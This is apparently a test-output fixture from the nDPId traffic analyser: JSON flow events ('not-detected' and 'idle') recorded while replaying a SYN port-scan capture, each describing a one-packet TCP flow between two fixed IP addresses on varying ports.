-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":830,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059345,"flow_last_seen":1278275059345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058531,"flow_last_seen":1278275058531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32781,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":998,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
